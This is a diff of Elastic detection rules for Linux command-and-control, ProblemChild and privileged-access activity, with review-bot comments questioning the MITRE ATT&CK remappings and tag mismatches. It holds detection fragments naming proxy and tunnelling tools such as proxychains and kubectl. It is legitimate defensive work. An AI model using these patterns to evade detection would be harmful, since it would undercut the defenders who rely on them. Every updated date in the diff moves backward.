@@ -79,17 +79,24 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml index 49333d5a47a..24db21c141b 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/19" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -90,3 +90,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
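Review bot: Switching this rule's tactic from Initial Access (`TA0001`) to Privilege Escalation (`TA0004`) is not backed by what it detects — a user seen from a region that is rare for them is a logon-stage signal, which is why `T1078` sat under Initial Access, and nothing in the hunk shows the job scoring privilege changes. Unless the PAD job is known to restrict itself to privileged logons, keep `TA0001` (and the `"Tactic: Initial Access"` tag), or carry both tactics as separate `[[rule.threat]]` entries since T1078 is valid under either. The tag and tactic edits are at least consistent with each other, so no tag gap is introduced here.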
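Review bot: The threat mapping appended here uses `T1218` (System Binary Proxy Execution), while the sibling ProblemChild rules in this same patch (rare process for a parent process, rare process for a user, and the three cluster rules) map the same kind of signal to `T1036` (Masquerading); a rare process for a host says nothing about a signed system binary being used as a proxy, so the divergence looks accidental. Use `T1036` here too, or document why this rule alone implies T1218. Since the tags list is outside this hunk, also confirm it carries `"Tactic: Defense Evasion"` for the new `TA0005` entry; the doubled blank line before `[rule.threat.tactic]` is cosmetic.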
diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml index ee6dee10815..abb8bb47e03 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -92,3 +92,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml index 640761874bc..513d1a8b875 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 
@@ -82,30 +82,26 @@ The LotL Attack Detection integration detects living-off-the-land activity in Wi - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Living off the Land Attack Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml index 3fbffb61ab0..c9d776c0b19 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -113,3 +113,21 @@ not (process.parent.name : "opera.exe" and process.command_line: "*--type=render ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml index 45959ad908c..283a4020daf 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
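Review bot: `T1036.004` (Masquerade Task or Service) is narrower than what this rule evidences — the ProblemChild query scores process executions in general (the visible exclusion is a browser renderer child process), not scheduled tasks or services specifically — and the other ProblemChild rules in this patch map to the parent `T1036` only. Drop the `[[rule.threat.technique.subtechnique]]` block so the mapping stays at `T1036`, unless the model is known to key on task or service names; the same subtechnique is added to the low-probability twin rule below. The tags list is outside this hunk, so confirm it includes `"Tactic: Defense Evasion"` for the new `TA0005` entry. The three consecutive blank lines before `[rule.threat.tactic]` are cosmetic.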
@@ -117,3 +117,21 @@ The detection leverages a machine learning model to identify potentially suspici - Escalate the incident to the security operations center (SOC) or relevant security team for further analysis and to determine if additional systems are affected.""" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml index eaeea2b1bae..22b4da6597d 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -91,3 +91,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml index c23efcce91d..7b94ae3ca14 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -93,3 +93,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml index 0d020444c91..a5b82dcbbf8 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 
@@ -93,3 +93,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml index d685f0e9f35..2bbc37b2ccd 100644 --- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml +++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/21" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/16" [rule] author = ["Elastic"] @@ -90,19 +90,15 @@ The AWS CLI allows users to interact with AWS services via command-line, offerin framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml index ce9bc194297..cab972324d4 100644 --- a/rules/linux/command_and_control_cat_network_activity.toml +++ b/rules/linux/command_and_control_cat_network_activity.toml 
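Review bot: Replacing `T1071.001` (Web Protocols) with `T1102` (Web Service) misdescribes this rule: T1102 is for abuse of legitimate, popular external web services (paste sites, social media, cloud storage) as C2 infrastructure, whereas `aws --endpoint-url` pointed at an arbitrary host is generic HTTPS traffic to an attacker- or third-party-controlled endpoint, which is `T1071.001` (or `T1048`/`T1567` if the concern is data leaving to a non-AWS endpoint). Keep the original technique block. This edit also moves in the opposite direction from the Telegram rule later in this patch, where `T1102` is swapped out for `T1071.001`, so the two changes cannot both be right; pick one convention for "legitimate web service" versus "arbitrary web endpoint" and apply it to both.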
@@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/16" [transform] [[transform.osquery]] @@ -128,7 +128,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=3s @@ -149,11 +156,6 @@ sequence by host.id, process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" @@ -162,15 +164,13 @@ reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1048.003" -name = "Exfiltration Over Unencrypted Non-C2 Protocol" -reference = "https://attack.mitre.org/techniques/T1048/003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0010" 
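Review bot: After this hunk the rule has three tactic-only `[[rule.threat]]` entries (Command and Control, the new Defense Evasion, and Exfiltration) and no technique at all, because `T1095` and `T1048.003` are both removed; the `T1048.003` (Exfiltration Over Unencrypted Non-C2 Protocol) block was the one technique that named the `cat`-driven network activity this rule is titled for, so I would keep it under TA0010. The tags hunk also drops `"Tactic: Exfiltration"` while the Exfiltration entry stays and a Defense Evasion entry is added, leaving two tactics without a matching tag — add `"Tactic: Defense Evasion",` and `"Tactic: Exfiltration",` or remove those entries. Nothing visible explains the Defense Evasion tactic for this pattern; a bare tactic with no technique is a weak mapping and should at least be justified in the description.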
diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml index ec8b3e38082..5356874e6a6 100644 --- a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml +++ b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -97,7 +97,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=10s @@ -111,15 +119,13 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1203" 
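Review bot: The tag list swaps `"Tactic: Execution"` for `"Tactic: Command and Control"`, but the `[[rule.threat]]` entry with `T1203` under TA0002 Execution is kept further down in this file, so the Execution tag is now missing; keep both tags. The next hunk in this file also adds Defense Evasion and Exfiltration entries, which likewise have no `Tactic:` tag here.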
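Review bot: The removed `T1059.004` (Unix Shell) was the technique that best describes a foomatic-rip child invoking a shell before the outbound connection (the query is cut off, so I am inferring this from the rule name), and its replacement is a Command and Control entry with a tactic and no technique. If the C2 angle is wanted, give it a technique (`T1071` or `T1095`) and keep `T1059.004` under Execution rather than deleting it. The hunk ends at `id = "T1203"`, so the rest of that technique block is outside view.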
@@ -130,3 +136,19 @@ reference = "https://attack.mitre.org/techniques/T1203/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml index 62bb09e0ed4..cfdde4aab58 100644 --- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml +++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/16" [rule] author = ["Elastic"] @@ -125,9 +125,9 @@ Curl is a versatile command-line tool used for transferring data with URLs, ofte framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml index ebb3cfff1cb..8e5b77e396f 100644 --- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml +++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/16" [rule] author = ["Elastic"] 
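Review bot: Both `[[rule.threat]]` entries appended here (`TA0005` Defense Evasion, `TA0010` Exfiltration) carry only a tactic and no technique, and neither tactic has a matching `Tactic:` tag in the list edited earlier in this file, which now names only Command and Control. If Exfiltration is genuinely meant for a print-daemon child calling out, `T1041` (Exfiltration Over C2 Channel) would give it a technique, and I see nothing in the rule that supports Defense Evasion at all — drop that entry unless the description explains it. Either way, add `"Tactic: Execution"`, `"Tactic: Defense Evasion"` and `"Tactic: Exfiltration"` to the tags, or remove the corresponding entries.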
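Review bot: Routing curl through a SOCKS proxy is the textbook case of `T1090` (Proxy) — relaying traffic via an intermediary — and `T1572` (Protocol Tunneling) describes encapsulating one protocol inside another, which curl's proxy options do not do on their own; replacing T1090 wholesale loses the accurate mapping rather than refining it. If the intent is to standardise tunnel-capable tools on T1572, keep `T1090` as a second `[[rule.threat.technique]]` block instead of deleting it. The same T1090→T1572 substitution is made for the proxychains, IP forwarding and Earthworm rules elsewhere in this patch while the kubectl rule keeps both, so the decision should be taken once and applied consistently.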
@@ -117,9 +117,9 @@ sequence by process.entity_id, host.id with maxspan=10s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_ip_forwarding_activity.toml b/rules/linux/command_and_control_ip_forwarding_activity.toml index 3357c9ea7ff..f810448aa2e 100644 --- a/rules/linux/command_and_control_ip_forwarding_activity.toml +++ b/rules/linux/command_and_control_ip_forwarding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -93,14 +93,9 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - -[[rule.threat.technique.subtechnique]] -id = "T1090.001" -name = "Internal Proxy" -reference = "https://attack.mitre.org/techniques/T1090/001/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_kubectl_networking_modification.toml b/rules/linux/command_and_control_kubectl_networking_modification.toml index 43c150612d1..7eb417f4e4d 100644 --- a/rules/linux/command_and_control_kubectl_networking_modification.toml +++ b/rules/linux/command_and_control_kubectl_networking_modification.toml 
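Review bot: Replacing `T1105` (Ingress Tool Transfer) with `T1071` (Application Layer Protocol) is a regression in accuracy for this rule: cloning a repository or downloading a file into a suspicious directory is the definition of bringing tooling onto the host, while T1071 describes the protocol of a C2 channel, which a git clone or file download does not evidence. Restore the `T1105` block (T1071 can stay as a second technique if the C2 tactic is to remain). The `[rule.threat.tactic]` block stays `TA0011`, which remains valid for T1105.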
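Review bot: The removed `T1090.001` (Internal Proxy) was the precise technique for this rule — enabling IP forwarding turns the host into a pivot that relays traffic for other internal systems — whereas `T1572` (Protocol Tunneling) is about encapsulating one protocol in another, which a forwarding sysctl change does not do by itself. Keep the `T1090` + `T1090.001` blocks, optionally alongside T1572. The query is outside this hunk, so I am inferring the detection from the rule name and the `not (` exclusion preamble.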
@@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -122,16 +122,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml index 49fe7f35a5a..acd204dae9a 100644 --- a/rules/linux/command_and_control_linux_kworker_netcon.toml +++ b/rules/linux/command_and_control_linux_kworker_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/24" [rule] author = ["Elastic"] @@ -46,7 +46,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -103,20 +110,42 @@ Kworker processes are integral to Linux systems, handling kernel tasks like inte [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/command_and_control_linux_proxychains_activity.toml b/rules/linux/command_and_control_linux_proxychains_activity.toml index 86f11516b7b..c86530e3580 100644 --- a/rules/linux/command_and_control_linux_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [transform] [[transform.osquery]] 
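Review bot: The tags hunk above replaces `"Tactic: Defense Evasion"` with `"Tactic: Command and Control"`, but this hunk keeps the Defense Evasion `[[rule.threat]]` entry and adds an Exfiltration one, so two of the three tactics now lack a `Tactic:` tag; add `"Tactic: Defense Evasion",` and `"Tactic: Exfiltration",` back. The removed `T1036.005` (Match Legitimate Name or Location) is exactly what a fake `kworker` process name is, and dropping it while adding `T1014` (Rootkit) makes the mapping vaguer rather than tighter — keep the subtechnique. The new Command and Control entry carries no technique; if a C2 mapping is wanted, give it one (`T1071` or `T1095`) rather than a bare tactic.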
@@ -140,9 +140,9 @@ process.name == "proxychains" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml index 0eb28ef7597..b4d383c26e2 100644 --- a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml +++ b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -111,7 +111,17 @@ references = ["https://book.hacktricks.xyz/generic-methodologies-and-resources/t risk_score = 21 rule_id = "29f0cf93-d17c-4b12-b4f3-a433800539fa" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
